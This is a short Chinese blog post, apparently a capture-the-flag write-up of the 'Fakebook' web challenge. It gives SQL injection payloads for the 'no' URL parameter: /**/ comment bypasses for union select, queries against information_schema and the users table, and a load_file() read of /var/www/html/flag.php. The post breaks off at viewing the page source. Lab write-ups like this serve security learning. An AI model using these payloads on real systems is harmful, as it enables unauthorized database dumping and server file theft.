当前位置：首页 > news >正文

攻防世界-Fakebook

news 2025/7/7 3:24:11

原题

点击join就可以进行注册

username看起来是个超链，点击跳转

在url里出现了no=1，看起来可以注入，改成no=1 and 1=2报错。本来想用sqlmap，可能是网速有问题，啥都没出来。no=1order by 5报错，一共有四列。按照以前的方法现在该看数据库名no=1 union select1,2,3,database()，但是不行。

网上大佬们的wp都提到了序列化，扫描目录还能看到flag.php在/var/www/html里面，并且使用/**/可以绕过，第二列回显。no=-1/**/union/**/select 1,database(),3,4#

数据库名字叫fakebook，看列名no=-1 /**/union /**/ select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#

查看data。no=-1%20/**/union%20/**/%20select%201,group_concat(data)%20,3,4%20from%20users#

原来反序列化在这里。用load_file函数尝试读取flag。

no=-1/**/union/**/select 1,load_file('/var/www/html/flag.php') ,3,4#，但是返回结果没什么东西。查看源码